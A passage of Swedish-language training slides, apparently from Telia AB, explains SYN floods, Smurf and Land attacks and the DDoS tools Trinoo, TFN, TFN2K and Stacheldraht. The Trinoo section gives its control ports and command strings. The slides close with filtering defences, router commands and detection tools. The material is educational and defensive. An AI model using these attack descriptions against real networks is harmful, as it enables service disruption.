u Testar om målsystemet står emot en attacku Använder falsk avsändaradressu Sänder SYN-floder på en eller flera portaru Varje SYN-pakets storlek 4Kb

URL: http://www.jabukie.com/Unix_Sourcez/synk4.c

66

Telia AB

# netstat -tctcp 0 1 172.16.200.3:80 135.4.201.4:1422 SYN_RECVtcp 0 1 172.16.200.3:80 135.132.201.4:1426 SYN_RECVtcp 0 1 172.16.200.3:80 135.4.201.4:1782 SYN_RECVtcp 0 1 172.16.200.3:80 135.132.201.4:1786 SYN_RECVtcp 0 1 172.16.200.3:80 135.4.201.4:8042 SYN_RECVtcp 0 1 172.16.200.3:80 135.132.201.4:8046 SYN_RECVtcp 0 1 172.16.200.3:80 135.4.201.4:1002 SYN_RECVtcp 0 1 172.16.200.3:80 135.132.201.4:1006 SYN_RECVtcp 0 1 172.16.200.3:80 135.4.201.4:1362 SYN_RECVtcp 0 1 172.16.200.3:80 135.132.201.4:1366 SYN_RECVtcp 0 1 172.16.200.3:80 135.4.201.4:1722 SYN_RECVtcp 0 1 172.16.200.3:80 135.132.201.4:1726 SYN_RECVtcp 0 1 172.16.200.3:80 135.4.201.4:2082 SYN_RECVtcp 0 1 172.16.200.3:80 135.132.201.4:2086 SYN_RECVtcp 0 1 172.16.200.3:80 135.4.201.4:2442 SYN_RECV

SYN-flooding sett från Netstat

Med programmet Netstat kan man ”se” hur en SYN-flooding ser ut.

67

Telia AB

Smurf-attack

u Ping sänds till broadcast-adresser (”ICMP Echo Request”-paket

u Avsändaradressen sätts till ”offrets”

u Ping sprids till alla system i nätverket, som svarar till offretu Offret dränks i Ping-svar (”ICMP Echo Reply”-paket)

Broadcast PING address xxx.xxx.xxx.255Broadcast PING address yyy.yyy.yyy.255 … … … … … Broadcast PING address nnn.nnn.nnn.255

Kusiner:• Fraggle• PapaSmurf

Responses!!

Responses!!

Ethernet-nätverk använder sig av en broadcast-adress för att sända ut paket till en stormängd mottagare, utan att behöva adressera var och en av dessa. Förslagsvis sänds dessatill routrar och andra nätkomponenter.

I en smurf-attack sänds ping-paket till broadcast-adressen på ett eller flerastörre nätverk. Avsändaradressen sätts till det system man vill dränka i PING-svar, detgenereras max 255 svar per broadcast-adress.

Då varje enhet på nätverket svarar sänds svaret tillbaka till "offret" och dränkerdenna. Effekten brukar bli att "offrets" system lägger sig ned på rygg och sprattlar.

Denna attack kan ganska enkel stoppas genom filtrering. Det är inte "normalt" att sända enPing-förfrågan till en broadcast-adress. Det gör därför ingen skada att stänga av dennatrafik.

68

Telia AB

Land / La Tierra

u Sänder ett SYN-paket där:u avsändaradress = mottagaradress = offrets ip-adressu avsändarport = mottagarport = öppen port hos offret

u Beror på dåligt implementerad IP-stack

u Skydd: Sätt filters i routers, brandväggar sominte tillåter att avsändaradress är samma sommottagaradress

La Tierra är en ”bättre” variant av Land

- kan attackera hela C-nät

- ange start- slutport

- ange antal loopar eller ”until dead” (forever)

- ange TCP-flaggor (fin, syn, reset, push, ack, urgent)

- ange TTL, window-size, sekvensnr (ISN) och meddelandetyp

- kan använda namn istf ip-adresser

- kan använda en ascii-filer som indatafil innehållande ip-adresser

69

Telia AB

Distribuerad DoS

u Knäck ett systemu Installera DDoS-verktygu Mål 1: Placera ut serverprogramu Mål 2: Placera ut klientprogramu Mål 3: Etablera samband / kommunicerau Mål 4: Attackera

70

Telia AB

Tidsschema DDoS

u Analys av programkod Dave Grittich aug-99u Överlämnades till CERT som gjorde egen analysu CERT fann attackmönster från juli-99u CERT misstänkte Y2K-attack -> locket påu Officiell release av TFN i sept-99u CERT Advisory 99-11-18 (http://www.cert.org/incident_notes/IN-99-07.html)

u FIRST EWT i dec-99u TFN ’in the wild’

71

Telia AB

Trinoo

27665/tcp(telnet)

27444/udp 31335/udp

MASTER

MASTER

MASTER

Attacker

CLIENT CLIENT

Genom att ta över flertalet system och installera master- och slavprogram idessa kan man köra en DDoS-attack. Slavdatorerna är de som gör självaarbetet med att försöka "sänka" målsystemet. Master-systemen styrslavdatorerna och kan t.ex. styra mot olika målsystem. Hackaren i sin tur,sitter och styr Mastern.

Detta förfarande medför att den är "bökigare" att finna förövaren då manmåste spåra i flera olika steg. System för system.

Hackern kontaktar Master-system genom att ange ”rätt” lösenord. Detta föratt förhindra att andra använder/missbrukar ”hans” system.

En Master kan kontakta Klienter när som helst genom att sända strängen l44i ett udp-paket.

Mastern kan kontrollera om de ”tagna” klienterna fortfarande är i hans ägogenom att sända en broadcast med strängen PONG i ett udp-paket.Klienterna svarar Mastern genom att sända strängen HELLO/tcp på port27665. Mastern upprättar komm.kanal på port 27444/udp och Klientersvarar på port 31335/udp.

Vid attack sänder varje Master en signal till Klienterna att starta attacken.Signalen kan vara flera udp-paket à 4 bytes innehållande nollor. Klienternasänder stora mängder udp-paket till offret på slumpvis valda portar. De IP-adresser som är offer finns lagrade i en fil på Mastern som är ”krypterad”med Ceasar Cipher.

72

Telia AB

TFN

Any ”terminal”protocol

icmp

CLIENT

CLIENT

CLIENT

Attacker

DAEMONS DEAMONS

icmp

ICMP flood, SYN flood, UDPflood, and "Smurf" styleattacks

TFN fungerar på liknande som Trinoo och kan använda sig av ICMP, TCP och UDP för attinitiera en SYN-flood eller Smurf-attack. Skillnanden mellan TFN och Trinoo är attkommunikationen mellan Masters och slavar sker i TFN med "ICMP Echo Reply".Eftersom dessa paket är vanliga att använda även för andra applikationer/tjänster så är detväldigt svårt att blockera dessa paet. Om man gör detta är det stor risk att man blockerar enstor del av den ordinarie trafiken. Då nätverksövervakningsverktyg inte kontrollerarstorleken på dessa ICMP-paket kan det vara svårt för hackern att övervaka trafiken mellanMaster och slavarna.

73

Telia AB

TFN2K

Randomencryptedudp/tcp/icmp

MASTER

MASTER

MASTER

Attacker (”Client”)

AGENTS AGENTS

TCP/SYN, UDP, ICMP/PING, orBROADCAST PING (SMURF)packet flood

Randomencryptedudp/tcp/icmp

Fungerar som tidigare fast på NT-plattform.

Klienterna /agenterna kan vara W95-system.

74

Telia AB

Stacheldraht

16660/tcpencrypted

icmp

HANDLER

HANDLER

HANDLER

Attacker (”Client”)

AGENTS AGENTS

65000/tcp,icmp

ICMP flood, SYN flood, UDPflood, and "Smurf" styleattacks

Stacheldracht är tyska och betyder taggtråd. Denna tyska variant av DDoS är merasofistikerad

då den är en kombination av Trinoo och TFN. Den krypterar kommunikationen mellanhackern och befintliga Masters, detta i syfte att ingen annan ska kunna ta över eller lånadessa system.

Krypteringen hjälper även till att skydda mot upptäckt. Slavarna kan själva ladda ned enuppdaterad Stacheldracht-progamvara och installera denna.

75

Telia AB

Skyddsåtgärder

u Förhindra att ditt nätverk används som källa för attack:u Aktivera filter på dina nätsegment

u Tillåt endast utgående paket med avsändaradress inom ditt nätblock / dina nätsegmentu Förhindra utgående trafik som har ”privata adresser”u Förhindra att man använder dig som förstärkare, dvs nyttjar din broadcast, dvs tillåt ej

”direct broadcast”u Hindra inkommande paket med avsändaradress inom ditt nätblock.

u Stäng av ”IP direct-broadcast”u Stäng av ”ICMP echo reply” till ”broadcast”-adresseru Detta skyddar mot flera olika DoS-attacker

FILTER:

ftp://ds.internic.net/internet-drafts/draft-ferguson-ingress-filtering-03.txt

För att förhindra en ”bounce”-attack bör man: Stänga av ”directed broadcasts” till nät medmed 5 system eller fler.

• Cisco: Interface command “no ip directed-broadcast”

• Proteon: IP protocol configuration “disable directed-broadcast”

• Bay Networks: Set a false static ARP address for broadcast address

Eventuellt kan man använda ACL (access control lists) för att förhindra ”ICMP-echo” tillditt nätverk. Försvårar dock felsökning.

Stäng av ”ICMP-echo reply” till broadcast-adresser. Detta är godkänt enligt RFC-1122avsnitt 3.2.2.6 “An ICMP Echo Request destined to an IP broadcast or IP multicast addressMAY be silently discarded.”

LÄNKAR:Zombie Zapper är ett program som eliminerar slav- och masterprogram i systemenURL: http://razor.bindview.com/tools/index.html

FBI har tagit fram ett verktyg som kontrollerar om det finns Master- eller slavprogram på ditt system URL: http://www.fbi.gov/nipc.trinoo.htm

Den person som nog gjort mest för att analysera och varna oss om dessa program ärDavid Dittrich på Washington University. Hans analyser och "white papers" finns påURL: http://staff.washington.edu/dittrich/misc.URL: http://staff.washington.edu/dittrich/misc/sickenscan.tar

76

Telia AB

Referenser

u CERT/CC (URL: www.cert.org )u SANS (URL: www.sans.org)

u Federal Incident Response Capability (URL: www.fedcirc.llnl.gov )

u Datorrelaterade missbruk och brott - en kartläggning gjord av effektivitetsrevisionen, RRV1997:33, Riksrevisionsverket, ISBN: 91 7498 267 2

u Computer Security Incident Handling - Step by step, SANS Institute,1998u Intrusion Detection, Edward Amoroso, Intrusion.Net Books, 1999

u An Analysis of Security Incidents On The Internet, 1989-1995, John Howard, CERT/CCu Incidentorganisation och incidenthantering, Jimmy Arvidsson, Stockholms Universitet DSV/KTH

u Current and Future Danger: A CSI Primer on Computer Crime & Information Warfare, RichardPower, Computer Security Institute, 1999

u Hacking Exposed, McClure, Scambray, Kurtz, Osborne/McGrawHill (www.osborne.com/hacking)

Documents

Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport